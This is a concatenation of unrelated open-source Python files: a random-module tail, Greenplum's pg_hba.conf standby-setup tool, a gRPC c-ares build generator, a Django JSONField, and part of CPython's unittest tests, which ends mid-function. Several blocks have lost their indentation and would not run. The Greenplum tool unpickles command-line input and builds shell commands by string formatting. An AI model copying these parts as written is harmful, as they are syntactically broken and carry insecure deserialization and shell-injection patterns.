        """Get the next random number in the range [0.0, 1.0)."""
        # 7 bytes = 56 bits; discard the low 3 to get a 53-bit (BPF)
        # integer, then scale into [0.0, 1.0).
        return (long(_hexlify(_urandom(7)), 16) >> 3) * RECIP_BPF

    def getrandbits(self, k):
        """getrandbits(k) -> x.  Generates a long int with k random bits."""
        if k <= 0:
            raise ValueError('number of bits must be greater than zero')
        if k != int(k):
            raise TypeError('number of bits should be an integer')
        bytes = (k + 7) // 8                    # bits / 8 and rounded up
        x = long(_hexlify(_urandom(bytes)), 16)
        return x >> (bytes * 8 - k)             # trim excess bits

    def _stub(self, *args, **kwds):
        "Stub method.  Not used for a system random number generator."
        return None
    # The OS entropy source cannot be seeded or jumped; these are no-ops.
    seed = jumpahead = _stub

    def _notimplemented(self, *args, **kwds):
        "Method should not be called for a system random number generator."
        raise NotImplementedError('System entropy source does not have state.')
    getstate = setstate = _notimplemented
## -------------------- test program --------------------
def _test_generator(n, func, args):
import time
print n, 'times', func.__name__
total = 0.0
sqsum = 0.0
smallest = 1e10
largest = -1e10
t0 = time.time()
for i in range(n):
x = func(*args)
total += x
sqsum = sqsum + x*x
smallest = min(x, smallest)
largest = max(x, largest)
t1 = time.time()
print round(t1-t0, 3), 'sec,',
avg = total/n
stddev = _sqrt(sqsum/n - avg*avg)
print 'avg %g, stddev %g, min %g, max %g' % \
(avg, stddev, smallest, largest)
def _test(N=2000):
    """Smoke-test every distribution method with N samples each."""
    _test_generator(N, random, ())
    _test_generator(N, normalvariate, (0.0, 1.0))
    _test_generator(N, lognormvariate, (0.0, 1.0))
    _test_generator(N, vonmisesvariate, (0.0, 1.0))
    # Sweep gammavariate across a wide range of shape parameters (each
    # range hits a different branch of the implementation).
    for alpha, beta in ((0.01, 1.0), (0.1, 1.0), (0.1, 2.0), (0.5, 1.0),
                        (0.9, 1.0), (1.0, 1.0), (2.0, 1.0), (20.0, 1.0),
                        (200.0, 1.0)):
        _test_generator(N, gammavariate, (alpha, beta))
    _test_generator(N, gauss, (0.0, 1.0))
    _test_generator(N, betavariate, (3.0, 3.0))
    _test_generator(N, triangular, (0.0, 1.0, 1.0/3.0))
# Create one instance, seeded from current time, and export its methods
# as module-level functions.  The functions share state across all uses
# (both in the user's code and in the Python libraries), but that's fine
# for most programs and is easier for the casual user than making them
# instantiate their own Random() instance.

# The single shared module-level generator; every function below is a
# bound method of this instance, so they all share one internal state.
_inst = Random()
seed = _inst.seed
random = _inst.random
uniform = _inst.uniform
triangular = _inst.triangular
randint = _inst.randint
choice = _inst.choice
randrange = _inst.randrange
sample = _inst.sample
shuffle = _inst.shuffle
normalvariate = _inst.normalvariate
lognormvariate = _inst.lognormvariate
expovariate = _inst.expovariate
vonmisesvariate = _inst.vonmisesvariate
gammavariate = _inst.gammavariate
gauss = _inst.gauss
betavariate = _inst.betavariate
paretovariate = _inst.paretovariate
weibullvariate = _inst.weibullvariate
getstate = _inst.getstate
setstate = _inst.setstate
jumpahead = _inst.jumpahead
getrandbits = _inst.getrandbits

# Run the statistical smoke test when executed as a script.
if __name__ == '__main__':
    _test()
| gpl-3.0 |
zaksoup/gpdb | gpMgmt/bin/gppylib/operations/initstandby.py | 35 | 9596 | #!/usr/bin/env python
import os
import base64
import pickle
from gppylib.gpparseopts import OptParser, OptChecker
from gppylib.mainUtils import addStandardLoggingAndHelpOptions
from collections import defaultdict
from gppylib import gplog
from gppylib.commands import unix
from gppylib.commands.base import REMOTE, WorkerPool, Command
from gppylib.mainUtils import ExceptionNoStackTraceNeeded
from gppylib.operations import Operation
# Name of the pg_hba.conf backup file created next to each data directory's
# pg_hba.conf before it is modified.
PG_HBA_BACKUP = 'pg_hba.conf.bak'

logger = gplog.get_default_logger()

# Number of concurrent remote commands run per WorkerPool.
DEFAULT_BATCH_SIZE = 16
def get_standby_pg_hba_info(standby_host):
    """Return the pg_hba.conf section (one string) granting trust access to
    every IP address of the standby master host for the current user."""
    standby_ips = unix.InterfaceAddrs.remote('get standby ips', standby_host)
    current_user = unix.UserId.local('get userid')
    section = ['# standby master host ip addresses\n']
    for ip in standby_ips:
        # IPv6 addresses need a /128 host mask, IPv4 a /32 (MPP-15889).
        suffix = '/128' if ':' in ip else '/32'
        section.append('host\tall\t%s\t%s%s\ttrust\n' % (current_user, ip, suffix))
    return ''.join(section)
def cleanup_pg_hba_backup(data_dirs_list):
"""
cleanup the backup of pg_hba.config created on segments
"""
try:
for data_dir in data_dirs_list:
backup_file = os.path.join(data_dir, PG_HBA_BACKUP)
logger.info('Removing pg_hba.conf backup file %s' % backup_file)
if os.path.exists(backup_file):
os.remove(backup_file)
except Exception, ex:
logger.error('Unable to cleanup backup of pg_hba.conf %s' % ex)
def cleanup_pg_hba_backup_on_segment(gparr):
    """
    Cleanup the pg_hba.conf on all of the segments
    present in the array
    """
    logger.debug('Removing pg_hba.conf backup file on segments...')

    # Group segment data directories by host so one remote command per host
    # can service all of that host's segments.
    dirs_by_host = defaultdict(list)
    for seg in gparr.getDbList():
        if seg.isSegmentMaster() or seg.isSegmentStandby():
            continue
        dirs_by_host[seg.getSegmentHostName()].append(seg.getSegmentDataDirectory())

    pool = WorkerPool(numWorkers=DEFAULT_BATCH_SIZE)
    try:
        for host, dirs in dirs_by_host.items():
            # The directory list travels pickled + base64 on the command line.
            encoded_dirs = base64.urlsafe_b64encode(pickle.dumps(dirs))
            cmd = Command('Cleanup the pg_hba.conf backups on remote hosts',
                          cmdStr="$GPHOME/lib/python/gppylib/operations/initstandby.py -d %s -D" % encoded_dirs,
                          ctxt=REMOTE, remoteHost=host)
            pool.addCommand(cmd)
        pool.join()
        for item in pool.getCompletedItems():
            result = item.get_results()
            if result.rc != 0:
                logger.error('Unable to cleanup pg_hba.conf backup file %s' % str(result.stderr))
                logger.error('Please check the segment for more details')
    finally:
        pool.haltWork()
        pool.joinWorkers()
        pool = None
def restore_pg_hba(data_dirs_list):
    """Restore pg_hba.conf from its backup in each given data directory.

    Moves <data_dir>/pg_hba.conf.bak back over <data_dir>/pg_hba.conf.
    """
    import shutil
    for data_dir in data_dirs_list:
        logger.info('Restoring pg_hba.conf for %s' % data_dir)
        # Use shutil.move instead of os.system('mv ...'): no shell quoting
        # problems with unusual directory names, and a real exception on
        # failure instead of a silently ignored non-zero exit status.
        shutil.move(os.path.join(data_dir, PG_HBA_BACKUP),
                    os.path.join(data_dir, 'pg_hba.conf'))
def restore_pg_hba_on_segment(gparr):
    """
    Restore the pg_hba.conf on all of the segments
    present in the array
    """
    logger.debug('Restoring pg_hba.conf file on segments...')

    # Group segment data directories by host so one remote command per host
    # can service all of that host's segments.
    dirs_by_host = defaultdict(list)
    for seg in gparr.getDbList():
        if seg.isSegmentMaster() or seg.isSegmentStandby():
            continue
        dirs_by_host[seg.getSegmentHostName()].append(seg.getSegmentDataDirectory())

    pool = WorkerPool(numWorkers=DEFAULT_BATCH_SIZE)
    try:
        for host, dirs in dirs_by_host.items():
            encoded_dirs = base64.urlsafe_b64encode(pickle.dumps(dirs))
            cmd = Command('Restore the pg_hba.conf on remote hosts',
                          cmdStr="$GPHOME/lib/python/gppylib/operations/initstandby.py -d %s -r" % encoded_dirs,
                          ctxt=REMOTE, remoteHost=host)
            pool.addCommand(cmd)
        pool.join()
        for item in pool.getCompletedItems():
            result = item.get_results()
            if result.rc != 0:
                logger.error('Unable to restore pg_hba.conf %s' % str(result.stderr))
                logger.error('Please check the segment for more details')
    finally:
        pool.haltWork()
        pool.joinWorkers()
        pool = None
def backup_pg_hba(data_dirs_list):
try:
for data_dir in data_dirs_list:
logger.info('Backing up pg_hba.conf for %s' % data_dir)
# back it up
os.system('cp %s/pg_hba.conf %s/%s'% (data_dir, data_dir, PG_HBA_BACKUP))
except Exception, ex:
raise Exception('Failed to backup pg_hba.config file %s' % ex)
def backup_pg_hba_on_segment(gparr):
    """
    Backup the pg_hba.conf on all of the segments
    present in the array
    """
    logger.info('Backing up pg_hba.conf file on segments...')

    # Group segment data directories by host so one remote command per host
    # can service all of that host's segments.
    dirs_by_host = defaultdict(list)
    for seg in gparr.getDbList():
        if seg.isSegmentMaster() or seg.isSegmentStandby():
            continue
        dirs_by_host[seg.getSegmentHostName()].append(seg.getSegmentDataDirectory())

    pool = WorkerPool(numWorkers=DEFAULT_BATCH_SIZE)
    try:
        for host, dirs in dirs_by_host.items():
            encoded_dirs = base64.urlsafe_b64encode(pickle.dumps(dirs))
            cmd = Command('Backup the pg_hba.conf on remote hosts',
                          cmdStr="$GPHOME/lib/python/gppylib/operations/initstandby.py -d %s -b" % encoded_dirs,
                          ctxt=REMOTE, remoteHost=host)
            pool.addCommand(cmd)
        pool.join()
        for item in pool.getCompletedItems():
            result = item.get_results()
            if result.rc != 0:
                logger.error('Unable to backup pg_hba.conf %s' % str(result.stderr))
                logger.error('Please check the segment for more details')
    finally:
        pool.haltWork()
        pool.joinWorkers()
        pool = None
def update_pg_hba(standby_pg_hba_info, data_dirs_list):
    """Append the standby trust entries to pg_hba.conf in every data
    directory (after backing each file up).

    Returns the list of updated file contents; directories whose file
    already contained the entries are skipped and not included.
    """
    backup_pg_hba(data_dirs_list)
    updated_contents = []
    for data_dir in data_dirs_list:
        logger.info('Updating pg_hba.conf for %s' % data_dir)
        conf_path = '%s/pg_hba.conf' % data_dir
        with open(conf_path) as fp:
            contents = fp.read()
        if standby_pg_hba_info in contents:
            # Entries already present -- nothing to write for this dir.
            continue
        contents += standby_pg_hba_info
        with open(conf_path, 'w') as fp:
            fp.write(contents)
        updated_contents.append(contents)
    return updated_contents
def update_pg_hba_conf_on_segments(gparr, standby_host):
    """
    Updates the pg_hba.conf on all of the segments
    present in the array
    """
    logger.debug('Updating pg_hba.conf file on segments...')

    # Compute the standby's trust entries once; every segment receives the
    # same pickled, base64-encoded payload.
    standby_pg_hba_info = get_standby_pg_hba_info(standby_host)
    encoded_info = base64.urlsafe_b64encode(pickle.dumps(standby_pg_hba_info))

    dirs_by_host = defaultdict(list)
    for seg in gparr.getDbList():
        if seg.isSegmentMaster() or seg.isSegmentStandby():
            continue
        dirs_by_host[seg.getSegmentHostName()].append(seg.getSegmentDataDirectory())

    pool = WorkerPool(numWorkers=DEFAULT_BATCH_SIZE)
    try:
        for host, dirs in dirs_by_host.items():
            encoded_dirs = base64.urlsafe_b64encode(pickle.dumps(dirs))
            cmd = Command('Update the pg_hba.conf on remote hosts',
                          cmdStr="$GPHOME/lib/python/gppylib/operations/initstandby.py -p %s -d %s" % (encoded_info, encoded_dirs),
                          ctxt=REMOTE, remoteHost=host)
            pool.addCommand(cmd)
        pool.join()
        for item in pool.getCompletedItems():
            result = item.get_results()
            if result.rc != 0:
                logger.error('Unable to update pg_hba.conf %s' % str(result.stderr))
                logger.error('Please check the segment log file for more details')
    finally:
        pool.haltWork()
        pool.joinWorkers()
        pool = None
def create_parser():
    """Build the option parser used when this module runs standalone on a
    segment host (see the __main__ block)."""
    parser = OptParser(option_class=OptChecker,
                       description='update the pg_hba.conf on all segments')
    addStandardLoggingAndHelpOptions(parser, includeNonInteractiveOption=True)
    parser.add_option('-p', '--pg-hba-info', dest='pg_hba_info',
                      metavar='<pg_hba entries>',
                      help='Entries that get added to pg_hba.conf file')
    parser.add_option('-d', '--data-dirs', dest='data_dirs',
                      metavar='<list of data dirs>',
                      help='A list of all data directories present on this host')
    # The three mutually-exclusive mode flags share the same shape.
    for short_opt, long_opt, help_text in (
            ('-b', '--backup', 'Backup the pg_hba.conf file'),
            ('-r', '--restore', 'Restore the pg_hba.conf file'),
            ('-D', '--delete', 'Cleanup the pg_hba.conf backup file')):
        parser.add_option(short_opt, long_opt, action='store_true',
                          help=help_text)
    return parser
if __name__ == '__main__':
    # Standalone entry point: this module is shipped to each segment host
    # and invoked over SSH by the *_on_segment() helpers above.  Complex
    # arguments arrive pickled and base64-encoded on the command line.
    parser = create_parser()
    (options, args) = parser.parse_args()
    # -d is required by every mode; decode the list of data directories.
    data_dirs = pickle.loads(base64.urlsafe_b64decode(options.data_dirs))
    if options.pg_hba_info:
        # -p: append the given entries to each pg_hba.conf (backs up first).
        pg_hba_info = pickle.loads(base64.urlsafe_b64decode(options.pg_hba_info))
        update_pg_hba(pg_hba_info, data_dirs)
    elif options.backup:
        backup_pg_hba(data_dirs)
    elif options.restore:
        restore_pg_hba(data_dirs)
    else:
        # -D (or no mode flag): remove the pg_hba.conf backup files.
        cleanup_pg_hba_backup(data_dirs)
| apache-2.0 |
fuchsia-mirror/third_party-grpc | src/c-ares/gen_build_yaml.py | 18 | 5765 | #!/usr/bin/env python2.7
# Copyright 2015 gRPC authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import re
import os
import sys
import yaml
os.chdir(os.path.dirname(sys.argv[0])+'/../..')
out = {}
try:
def gen_ares_build(x):
subprocess.call("third_party/cares/cares/buildconf", shell=True)
subprocess.call("third_party/cares/cares/configure", shell=True)
def config_platform(x):
if 'darwin' in sys.platform:
return 'src/cares/cares/config_darwin/ares_config.h'
if 'freebsd' in sys.platform:
return 'src/cares/cares/config_freebsd/ares_config.h'
if 'linux' in sys.platform:
return 'src/cares/cares/config_linux/ares_config.h'
if 'openbsd' in sys.platform:
return 'src/cares/cares/config_openbsd/ares_config.h'
if not os.path.isfile('third_party/cares/cares/ares_config.h'):
gen_ares_build(x)
return 'third_party/cares/cares/ares_config.h'
def ares_build(x):
if os.path.isfile('src/cares/cares/ares_build.h'):
return 'src/cares/cares/ares_build.h'
if not os.path.isfile('third_party/cares/cares/ares_build.h'):
gen_ares_build(x)
return 'third_party/cares/cares/ares_build.h'
out['libs'] = [{
'name': 'ares',
'defaults': 'ares',
'build': 'private',
'language': 'c',
'secure': 'no',
'src': [
"third_party/cares/cares/ares__close_sockets.c",
"third_party/cares/cares/ares__get_hostent.c",
"third_party/cares/cares/ares__read_line.c",
"third_party/cares/cares/ares__timeval.c",
"third_party/cares/cares/ares_cancel.c",
"third_party/cares/cares/ares_create_query.c",
"third_party/cares/cares/ares_data.c",
"third_party/cares/cares/ares_destroy.c",
"third_party/cares/cares/ares_expand_name.c",
"third_party/cares/cares/ares_expand_string.c",
"third_party/cares/cares/ares_fds.c",
"third_party/cares/cares/ares_free_hostent.c",
"third_party/cares/cares/ares_free_string.c",
"third_party/cares/cares/ares_getenv.c",
"third_party/cares/cares/ares_gethostbyaddr.c",
"third_party/cares/cares/ares_gethostbyname.c",
"third_party/cares/cares/ares_getnameinfo.c",
"third_party/cares/cares/ares_getopt.c",
"third_party/cares/cares/ares_getsock.c",
"third_party/cares/cares/ares_init.c",
"third_party/cares/cares/ares_library_init.c",
"third_party/cares/cares/ares_llist.c",
"third_party/cares/cares/ares_mkquery.c",
"third_party/cares/cares/ares_nowarn.c",
"third_party/cares/cares/ares_options.c",
"third_party/cares/cares/ares_parse_a_reply.c",
"third_party/cares/cares/ares_parse_aaaa_reply.c",
"third_party/cares/cares/ares_parse_mx_reply.c",
"third_party/cares/cares/ares_parse_naptr_reply.c",
"third_party/cares/cares/ares_parse_ns_reply.c",
"third_party/cares/cares/ares_parse_ptr_reply.c",
"third_party/cares/cares/ares_parse_soa_reply.c",
"third_party/cares/cares/ares_parse_srv_reply.c",
"third_party/cares/cares/ares_parse_txt_reply.c",
"third_party/cares/cares/ares_platform.c",
"third_party/cares/cares/ares_process.c",
"third_party/cares/cares/ares_query.c",
"third_party/cares/cares/ares_search.c",
"third_party/cares/cares/ares_send.c",
"third_party/cares/cares/ares_strcasecmp.c",
"third_party/cares/cares/ares_strdup.c",
"third_party/cares/cares/ares_strerror.c",
"third_party/cares/cares/ares_timeout.c",
"third_party/cares/cares/ares_version.c",
"third_party/cares/cares/ares_writev.c",
"third_party/cares/cares/bitncmp.c",
"third_party/cares/cares/inet_net_pton.c",
"third_party/cares/cares/inet_ntop.c",
"third_party/cares/cares/windows_port.c",
],
'headers': [
"third_party/cares/cares/ares.h",
"third_party/cares/cares/ares_data.h",
"third_party/cares/cares/ares_dns.h",
"third_party/cares/cares/ares_getenv.h",
"third_party/cares/cares/ares_getopt.h",
"third_party/cares/cares/ares_inet_net_pton.h",
"third_party/cares/cares/ares_iphlpapi.h",
"third_party/cares/cares/ares_ipv6.h",
"third_party/cares/cares/ares_library_init.h",
"third_party/cares/cares/ares_llist.h",
"third_party/cares/cares/ares_nowarn.h",
"third_party/cares/cares/ares_platform.h",
"third_party/cares/cares/ares_private.h",
"third_party/cares/cares/ares_rules.h",
"third_party/cares/cares/ares_setup.h",
"third_party/cares/cares/ares_strcasecmp.h",
"third_party/cares/cares/ares_strdup.h",
"third_party/cares/cares/ares_version.h",
"third_party/cares/cares/bitncmp.h",
"third_party/cares/cares/config-win32.h",
"third_party/cares/cares/setup_once.h",
"third_party/cares/ares_build.h",
"third_party/cares/config_darwin/ares_config.h",
"third_party/cares/config_freebsd/ares_config.h",
"third_party/cares/config_linux/ares_config.h",
"third_party/cares/config_openbsd/ares_config.h"
],
}]
except:
pass
print yaml.dump(out)
| apache-2.0 |
GbalsaC/bitnamiP | venv/lib/python2.7/site-packages/social/apps/django_app/default/fields.py | 80 | 2513 | import json
import six
from django.core.exceptions import ValidationError
from django.db import models
try:
from django.utils.encoding import smart_unicode as smart_text
smart_text # placate pyflakes
except ImportError:
from django.utils.encoding import smart_text
class JSONField(six.with_metaclass(models.SubfieldBase, models.TextField)):
    """TextField that transparently stores python structures as JSON
    strings in the database.
    """

    def __init__(self, *args, **kwargs):
        # Default to an empty JSON object rather than an empty string.
        kwargs.setdefault('default', '{}')
        super(JSONField, self).__init__(*args, **kwargs)

    def to_python(self, value):
        """
        Convert the input JSON value into python structures, raises
        django.core.exceptions.ValidationError if the data can't be converted.
        """
        if self.blank and not value:
            return {}
        raw = value or '{}'
        if isinstance(raw, six.binary_type):
            raw = six.text_type(raw, 'utf-8')
        if not isinstance(raw, six.string_types):
            # Already deserialized; hand it back untouched.
            return raw
        try:
            # with django 1.6 i have '"{}"' as default value here
            if raw[0] == raw[-1] == '"':
                raw = raw[1:-1]
            return json.loads(raw)
        except Exception as err:
            raise ValidationError(str(err))

    def validate(self, value, model_instance):
        """Check value is a valid JSON string, raise ValidationError on
        error."""
        if not isinstance(value, six.string_types):
            return
        super(JSONField, self).validate(value, model_instance)
        try:
            json.loads(value)
        except Exception as err:
            raise ValidationError(str(err))

    def get_prep_value(self, value):
        """Convert value to JSON string before save"""
        try:
            return json.dumps(value)
        except Exception as err:
            raise ValidationError(str(err))

    def value_to_string(self, obj):
        """Return value from object converted to string properly"""
        return smart_text(self.get_prep_value(self._get_val_from_obj(obj)))

    def value_from_object(self, obj):
        """Return value dumped to string."""
        return self.get_prep_value(self._get_val_from_obj(obj))
try:
    from south.modelsinspector import add_introspection_rules
    # Teach South (the legacy migrations tool) how to introspect JSONField;
    # this whole block is silently skipped when South is not installed.
    # The pattern is now a raw string: "\." in a non-raw literal is an
    # invalid escape sequence (DeprecationWarning on Python 3.6+) even
    # though it happens to produce the same characters.
    add_introspection_rules(
        [],
        [r"^social\.apps\.django_app\.default\.fields\.JSONField"]
    )
except:
    pass
| agpl-3.0 |
FireWRT/OpenWrt-Firefly-Libraries | staging_dir/target-mipsel_1004kc+dsp_uClibc-0.9.33.2/usr/lib/python3.4/unittest/test/test_case.py | 8 | 62504 | import contextlib
import difflib
import pprint
import pickle
import re
import sys
import logging
import warnings
import weakref
import inspect
from copy import deepcopy
from test import support
import unittest
from unittest.test.support import (
TestEquality, TestHashing, LoggingResult, LegacyLoggingResult,
ResultWithNoStartTestRunStopTestRun
)
from test.support import captured_stderr
# Loggers used by the logging-related assertion tests: a parent/child pair
# ('foo' and 'foo.bar') plus an unrelated logger ('quux').
log_foo = logging.getLogger('foo')
log_foobar = logging.getLogger('foo.bar')
log_quux = logging.getLogger('quux')
class Test(object):
    "Keep these TestCase classes out of the main namespace"

    class Foo(unittest.TestCase):
        # Minimal TestCase: a default runTest plus one named test method.
        def runTest(self): pass
        def test1(self): pass

    class Bar(Foo):
        # Subclass adding a second test method; used by the equality and
        # hashing tests to compare cases across classes.
        def test2(self): pass

    class LoggingTestCase(unittest.TestCase):
        """A test case which logs its calls."""

        def __init__(self, events):
            # Always runs the 'test' method; each lifecycle call is
            # appended (by name) to the shared *events* list.
            super(Test.LoggingTestCase, self).__init__('test')
            self.events = events

        def setUp(self):
            self.events.append('setUp')

        def test(self):
            self.events.append('test')

        def tearDown(self):
            self.events.append('tearDown')
class Test_TestCase(unittest.TestCase, TestEquality, TestHashing):

    ### Set up attributes used by inherited tests
    ################################################################

    # Used by TestHashing.test_hash and TestEquality.test_eq
    eq_pairs = [(Test.Foo('test1'), Test.Foo('test1'))]

    # Used by TestEquality.test_ne
    ne_pairs = [(Test.Foo('test1'), Test.Foo('runTest')),
                (Test.Foo('test1'), Test.Bar('test1')),
                (Test.Foo('test1'), Test.Bar('test2'))]

    ################################################################
    ### /Set up attributes used by inherited tests
# "class TestCase([methodName])"
# ...
# "Each instance of TestCase will run a single test method: the
# method named methodName."
# ...
# "methodName defaults to "runTest"."
#
# Make sure it really is optional, and that it defaults to the proper
# thing.
    def test_init__no_test_name(self):
        class Test(unittest.TestCase):
            # runTest would raise if executed; these tests never run it.
            def runTest(self): raise MyException()
            def test(self): pass

        self.assertEqual(Test().id()[-13:], '.Test.runTest')

        # test that TestCase can be instantiated with no args
        # primarily for use at the interactive interpreter
        test = unittest.TestCase()
        test.assertEqual(3, 3)
        with test.assertRaises(test.failureException):
            test.assertEqual(3, 2)

        # With no methodName there is nothing to run.
        with self.assertRaises(AttributeError):
            test.run()
# "class TestCase([methodName])"
# ...
# "Each instance of TestCase will run a single test method: the
# method named methodName."
    def test_init__test_name__valid(self):
        # Naming an existing method selects it as the test to run.
        class Test(unittest.TestCase):
            def runTest(self): raise MyException()
            def test(self): pass

        self.assertEqual(Test('test').id()[-10:], '.Test.test')
# "class TestCase([methodName])"
# ...
# "Each instance of TestCase will run a single test method: the
# method named methodName."
    def test_init__test_name__invalid(self):
        # Naming a nonexistent method must raise ValueError at construction.
        class Test(unittest.TestCase):
            def runTest(self): raise MyException()
            def test(self): pass

        try:
            Test('testfoo')
        except ValueError:
            pass
        else:
            self.fail("Failed to raise ValueError")
# "Return the number of tests represented by the this test object. For
# TestCase instances, this will always be 1"
    def test_countTestCases(self):
        # A single TestCase instance always counts as exactly one test.
        class Foo(unittest.TestCase):
            def test(self): pass

        self.assertEqual(Foo('test').countTestCases(), 1)
# "Return the default type of test result object to be used to run this
# test. For TestCase instances, this will always be
# unittest.TestResult; subclasses of TestCase should
# override this as necessary."
    def test_defaultTestResult(self):
        # The base class produces a plain unittest.TestResult -- the exact
        # type, not a subclass (hence type() rather than isinstance()).
        class Foo(unittest.TestCase):
            def runTest(self):
                pass

        result = Foo().defaultTestResult()
        self.assertEqual(type(result), unittest.TestResult)
# "When a setUp() method is defined, the test runner will run that method
# prior to each test. Likewise, if a tearDown() method is defined, the
# test runner will invoke that method after each test. In the example,
# setUp() was used to create a fresh sequence for each test."
#
# Make sure the proper call order is maintained, even if setUp() raises
# an exception.
    def test_run_call_order__error_in_setUp(self):
        events = []
        result = LoggingResult(events)

        class Foo(Test.LoggingTestCase):
            def setUp(self):
                super(Foo, self).setUp()
                raise RuntimeError('raised by Foo.setUp')

        Foo(events).run(result)
        # When setUp errors, the test body and tearDown are skipped.
        expected = ['startTest', 'setUp', 'addError', 'stopTest']
        self.assertEqual(events, expected)
# "With a temporary result stopTestRun is called when setUp errors.
    def test_run_call_order__error_in_setUp_default_result(self):
        events = []

        class Foo(Test.LoggingTestCase):
            def defaultTestResult(self):
                return LoggingResult(self.events)

            def setUp(self):
                super(Foo, self).setUp()
                raise RuntimeError('raised by Foo.setUp')

        # run() without an explicit result uses the default one, which
        # also receives the startTestRun/stopTestRun bracketing calls.
        Foo(events).run()
        expected = ['startTestRun', 'startTest', 'setUp', 'addError',
                    'stopTest', 'stopTestRun']
        self.assertEqual(events, expected)
# "When a setUp() method is defined, the test runner will run that method
# prior to each test. Likewise, if a tearDown() method is defined, the
# test runner will invoke that method after each test. In the example,
# setUp() was used to create a fresh sequence for each test."
#
# Make sure the proper call order is maintained, even if the test raises
# an error (as opposed to a failure).
    def test_run_call_order__error_in_test(self):
        events = []
        result = LoggingResult(events)

        class Foo(Test.LoggingTestCase):
            def test(self):
                super(Foo, self).test()
                raise RuntimeError('raised by Foo.test')

        # tearDown still runs when the test body errors; the error is
        # recorded after tearDown completes.
        expected = ['startTest', 'setUp', 'test', 'tearDown',
                    'addError', 'stopTest']
        Foo(events).run(result)
        self.assertEqual(events, expected)
# "With a default result, an error in the test still results in stopTestRun
# being called."
    def test_run_call_order__error_in_test_default_result(self):
        events = []

        class Foo(Test.LoggingTestCase):
            def defaultTestResult(self):
                return LoggingResult(self.events)

            def test(self):
                super(Foo, self).test()
                raise RuntimeError('raised by Foo.test')

        # With a default result, an error in the test still results in
        # stopTestRun being called.
        expected = ['startTestRun', 'startTest', 'setUp', 'test',
                    'tearDown', 'addError', 'stopTest', 'stopTestRun']
        Foo(events).run()
        self.assertEqual(events, expected)
# "When a setUp() method is defined, the test runner will run that method
# prior to each test. Likewise, if a tearDown() method is defined, the
# test runner will invoke that method after each test. In the example,
# setUp() was used to create a fresh sequence for each test."
#
# Make sure the proper call order is maintained, even if the test signals
# a failure (as opposed to an error).
    def test_run_call_order__failure_in_test(self):
        events = []
        result = LoggingResult(events)

        class Foo(Test.LoggingTestCase):
            def test(self):
                super(Foo, self).test()
                self.fail('raised by Foo.test')

        # A failure (as opposed to an error) is reported via addFailure,
        # and tearDown still runs first.
        expected = ['startTest', 'setUp', 'test', 'tearDown',
                    'addFailure', 'stopTest']
        Foo(events).run(result)
        self.assertEqual(events, expected)
# "When a test fails with a default result stopTestRun is still called."
    def test_run_call_order__failure_in_test_default_result(self):
        class Foo(Test.LoggingTestCase):
            def defaultTestResult(self):
                return LoggingResult(self.events)

            def test(self):
                super(Foo, self).test()
                self.fail('raised by Foo.test')

        # When a test fails with a default result stopTestRun is still
        # called.
        expected = ['startTestRun', 'startTest', 'setUp', 'test',
                    'tearDown', 'addFailure', 'stopTest', 'stopTestRun']
        events = []
        Foo(events).run()
        self.assertEqual(events, expected)
# "When a setUp() method is defined, the test runner will run that method
# prior to each test. Likewise, if a tearDown() method is defined, the
# test runner will invoke that method after each test. In the example,
# setUp() was used to create a fresh sequence for each test."
#
# Make sure the proper call order is maintained, even if tearDown() raises
# an exception.
    def test_run_call_order__error_in_tearDown(self):
        events = []
        result = LoggingResult(events)

        class Foo(Test.LoggingTestCase):
            def tearDown(self):
                super(Foo, self).tearDown()
                raise RuntimeError('raised by Foo.tearDown')

        Foo(events).run(result)
        # The test body succeeded, but the tearDown error is still
        # recorded as an error.
        expected = ['startTest', 'setUp', 'test', 'tearDown', 'addError',
                    'stopTest']
        self.assertEqual(events, expected)
# "When tearDown errors with a default result stopTestRun is still called."
    def test_run_call_order__error_in_tearDown_default_result(self):
        class Foo(Test.LoggingTestCase):
            def defaultTestResult(self):
                return LoggingResult(self.events)

            def tearDown(self):
                super(Foo, self).tearDown()
                raise RuntimeError('raised by Foo.tearDown')

        # When tearDown errors with a default result stopTestRun is still
        # called.
        events = []
        Foo(events).run()
        expected = ['startTestRun', 'startTest', 'setUp', 'test', 'tearDown',
                    'addError', 'stopTest', 'stopTestRun']
        self.assertEqual(events, expected)
# "TestCase.run() still works when the defaultTestResult is a TestResult
# that does not support startTestRun and stopTestRun.
    def test_run_call_order_default_result(self):
        # run() must tolerate result objects that lack the optional
        # startTestRun/stopTestRun methods.
        class Foo(unittest.TestCase):
            def defaultTestResult(self):
                return ResultWithNoStartTestRunStopTestRun()

            def test(self):
                pass

        Foo('test').run()
    def _check_call_order__subtests(self, result, events, expected_events):
        # Helper: run a test with a mix of failing, erroring and passing
        # subtests plus a final top-level ZeroDivisionError, then compare
        # the recorded events against *expected_events*.
        class Foo(Test.LoggingTestCase):
            def test(self):
                super(Foo, self).test()
                for i in [1, 2, 3]:
                    with self.subTest(i=i):
                        if i == 1:
                            self.fail('failure')
                        for j in [2, 3]:
                            with self.subTest(j=j):
                                if i * j == 6:
                                    raise RuntimeError('raised by Foo.test')
                1 / 0

        # Order is the following:
        # i=1 => subtest failure
        # i=2, j=2 => subtest success
        # i=2, j=3 => subtest error
        # i=3, j=2 => subtest error
        # i=3, j=3 => subtest success
        # toplevel => error
        Foo(events).run(result)
        self.assertEqual(events, expected_events)
    def test_run_call_order__subtests(self):
        events = []
        result = LoggingResult(events)
        # A result with addSubTest records each subtest outcome
        # individually, in execution order.
        expected = ['startTest', 'setUp', 'test', 'tearDown',
                    'addSubTestFailure', 'addSubTestSuccess',
                    'addSubTestFailure', 'addSubTestFailure',
                    'addSubTestSuccess', 'addError', 'stopTest']
        self._check_call_order__subtests(result, events, expected)
    def test_run_call_order__subtests_legacy(self):
        # With a legacy result object (without an addSubTest method),
        # test execution stops after the first subtest failure.
        events = []
        result = LegacyLoggingResult(events)
        expected = ['startTest', 'setUp', 'test', 'tearDown',
                    'addFailure', 'stopTest']
        self._check_call_order__subtests(result, events, expected)
    def _check_call_order__subtests_success(self, result, events, expected_events):
        # Helper: run a test whose nested subtests (2 outer x 2 inner)
        # all pass, then compare the recorded events.
        class Foo(Test.LoggingTestCase):
            def test(self):
                super(Foo, self).test()
                for i in [1, 2]:
                    with self.subTest(i=i):
                        for j in [2, 3]:
